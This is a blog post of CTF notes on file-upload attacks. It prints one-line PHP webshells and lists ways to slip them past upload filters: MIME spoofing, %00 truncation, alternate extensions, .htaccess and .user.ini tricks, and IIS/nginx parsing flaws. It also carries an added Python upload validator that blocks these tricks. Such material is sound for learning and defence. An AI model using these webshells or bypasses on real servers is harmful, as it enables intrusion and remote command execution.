<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="WEB Upload"><meta name="keywords" content="web,ctf,note,upload"><meta name="author" content="MOZac Connecter"><meta name="copyright" content="MOZac Connecter"><title>WEB Upload | MOZac的小屋</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="generator" content="Hexo 5.3.0"><link rel="alternate" href="/atom.xml" title="MOZac的小屋" type="application/atom+xml">
</head><body><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">MOZac的小屋</a></span><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span></div><div id="post-info"><div id="post-title">WEB Upload</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-10-03</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E7%AC%94%E8%AE%B0/">Notes</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="UPLOAD-TIPS"><a href="#UPLOAD-TIPS" class="headerlink" title="UPLOAD TIPS"></a>UPLOAD TIPS</h1><h2 id="按照形式分类"><a href="#按照形式分类" class="headerlink" title="按照形式分类"></a>Classified by form</h2><h3 id="上传shell"><a href="#上传shell" class="headerlink" title="上传shell"></a>Uploading a shell</h3><p>Upload a one-line webshell written in PHP or another language to the server, then connect to it with China Chopper (菜刀) / AntSword (蚁剑), or pass it parameters to execute commands.</p>
<p>One-line webshell examples:</p>
<pre><code>&lt;?eval(@$_POST[&#39;ls&#39;]); ?&gt;</code></pre>
<p>The simplest one-line webshell; it can be connected to with tools such as China Chopper or AntSword.</p>
<pre><code>&lt;script language=&#39;php&#39;&gt;@eval($_POST[&#39;ye&#39;]);&lt;/script&gt;
&lt;script language=&#39;php&#39;&gt;system(&#39;cat /flag&#39;);&lt;/script&gt;</code></pre>
<p>Simple PHP shells: the first line can be connected to with China Chopper, the second reads the flag directly. Note that the <code>&lt;script language=&#39;php&#39;&gt;</code> open tag was removed in PHP 7.0, so both lines only run on PHP 5.x.</p>
<h2 id="按照思路分类"><a href="#按照思路分类" class="headerlink" title="按照思路分类"></a>Classified by approach</h2><p>Taking an upload form that only permits images as the example:</p>
<h3 id="1-前端绕过"><a href="#1-前端绕过" class="headerlink" title="1 . 前端绕过"></a>1. Client-side (front-end) bypass</h3><p>The front end only requires the extension to be jpg, png or similar at the moment of upload; change it to php, asp or similar in Burp Suite.</p>
<h3 id="2-MIME检测绕过"><a href="#2-MIME检测绕过" class="headerlink" title="2 .MIME检测绕过"></a>2. MIME check bypass</h3><p>In Burp you can see the Content-Type header; change its value to image/gif.</p>
<h3 id="3-00截断绕过"><a href="#3-00截断绕过" class="headerlink" title="3 . 00截断绕过"></a>3. %00 truncation bypass</h3><p>Upload a file named xxx.php.jpg, then in Burp change the hex value of the dot (.), 2e, to 00.</p>
<h3 id="4-拓展名绕过"><a href="#4-拓展名绕过" class="headerlink" title="4.拓展名绕过"></a>4. Extension bypass</h3><p>1. When php is not allowed, try php3, php5, phtml or pht.</p>
<p>2. Change php to PHp or another uploadable form (case variation).</p>
<p>3. When the server OS is Windows, upload xxx.php. or xxx.php followed by a space; Windows automatically strips the trailing dot and space.</p>
<h3 id="5-上传特殊文件绕过"><a href="#5-上传特殊文件绕过" class="headerlink" title="5.上传特殊文件绕过"></a>5. Bypass by uploading special files</h3><h4 id="1-htaccess文件"><a href="#1-htaccess文件" class="headerlink" title="1 .htaccess文件"></a>1. .htaccess file</h4><p>Write the line SetHandler application/x-httpd-php into a .htaccess file and upload it; from then on an uploaded jpg is parsed as PHP, so next upload an image with the one-line shell written into it.</p>
<h4 id="2-usr-ini文件"><a href="#2-usr-ini文件" class="headerlink" title="2 .usr.ini文件"></a>2. .user.ini file</h4><img src="https://img-blog.csdnimg.cn/20200303143603929.png" style="width: 980px;">
<p>auto_prepend_file: specifies a file that is automatically included before the file being executed.</p>
<p>We can first upload a 1.jpg file, then write auto_prepend_file=1.jpg into .user.ini and upload that as well.</p>
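<p>As an added example (not code from the original post): a server-side upload check that rejects each of the filename and content tricks in sections 1 to 5 above, including image bodies that carry the one-line PHP shells shown at the top. The policy (only jpg/png/gif, server-chosen random storage name) and the magic-byte table are assumptions of this example.</p>

```python
# Added example, not code from the original post: a server-side upload check
# that rejects each filename/content trick in sections 1-5 above. The policy
# (only jpg/png/gif, server-chosen random name) is an assumption of the example.
import os
import re
import secrets

# Real file signatures for the allowed image types.
MAGIC = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8",
}
MIME_FOR = {"jpg": "image/jpeg", "jpeg": "image/jpeg",
            "png": "image/png", "gif": "image/gif"}
# PHP open tags (including the short "<?eval" form) and <script language='php'>.
# Can false-positive on binary data containing "<?x"; a rejected image can be
# re-encoded by the client, a missed webshell cannot be undone.
PHP_MARKERS = re.compile(
    rb"<\?(?:=|\s|[a-z_])|<script[^>]*\blanguage\s*=\s*['\"]?php", re.I)


def validate_upload(filename: str, content_type: str, data: bytes):
    """Return (True, storage_name) or (False, reason). Server side only (1.)."""
    # 3. %00 truncation: a NUL byte in a filename is never legitimate.
    if "\x00" in filename:
        return False, "null byte in filename"
    # Never trust client directory parts; then drop the trailing dots and
    # spaces that Windows would strip itself (4.3) before looking at the name.
    base = os.path.basename(filename.replace("\\", "/")).rstrip(". ")
    # 5. .htaccess / .user.ini: dotfiles and empty stems are rejected.
    if not base or base.startswith("."):
        return False, "dotfile or empty name"
    parts = base.lower().split(".")          # lower() defeats PHp (4.2)
    # Every dotted component after the stem must be an allowed image extension,
    # which rejects xxx.php.jpg as well as php3/php5/phtml/pht (4.1).
    if len(parts) < 2 or any(p not in MAGIC for p in parts[1:]):
        return False, "disallowed extension"
    ext = parts[-1]
    # 2. MIME bypass: the header is attacker controlled, so require it to agree
    # with the extension AND verify the file's magic bytes.
    declared = content_type.split(";")[0].strip().lower()
    if declared != MIME_FOR[ext]:
        return False, "content-type does not match extension"
    if not data.startswith(MAGIC[ext]):
        return False, "magic bytes do not match extension"
    # Image body carrying the one-line PHP shells shown above.
    if PHP_MARKERS.search(data):
        return False, "php code inside image"
    # Store under a server-chosen name; the client name never hits the disk.
    return True, f"{secrets.token_hex(16)}.{ext}"
```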

<h3 id="6-服务器漏洞"><a href="#6-服务器漏洞" class="headerlink" title="6 服务器漏洞"></a>6. Server vulnerabilities</h3><h4 id="1-IIS解析漏洞"><a href="#1-IIS解析漏洞" class="headerlink" title="1 IIS解析漏洞"></a>1. IIS parsing vulnerability</h4><p>On IIS 7.0/7.5, appending "/anything.php" to the URL of any file makes the server parse that file as PHP, e.g. 127.0.0.1/1.jpg/shell.php</p>
<h4 id="2-nginx解析漏洞"><a href="#2-nginx解析漏洞" class="headerlink" title="2 nginx解析漏洞"></a>2. nginx parsing vulnerability</h4><p>Same as above.</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">MOZac Connecter</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Post link: </span><span class="post-copyright-info"><a href="https://mozac-void.yixiangtang.icu/2020/10/03/Web-Upload-1/">https://mozac-void.yixiangtang.icu/2020/10/03/Web-Upload-1/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright notice: </span><span class="post-copyright-info">Unless otherwise stated, all posts on this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a>. Please credit <a href="https://mozac-void.yixiangtang.icu">MOZac的小屋</a> when reposting!</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/web/">web</a><a class="post-meta__tags" href="/tags/ctf/">ctf</a><a class="post-meta__tags" href="/tags/note/">note</a><a class="post-meta__tags" href="/tags/upload/">upload</a></div></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2019 - 2021 By MOZac Connecter</div><div class="framework-info"><span>Powered by </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="icp"><a><span>鲁ICP备2020049110号</span></a></div></div></footer></body></html>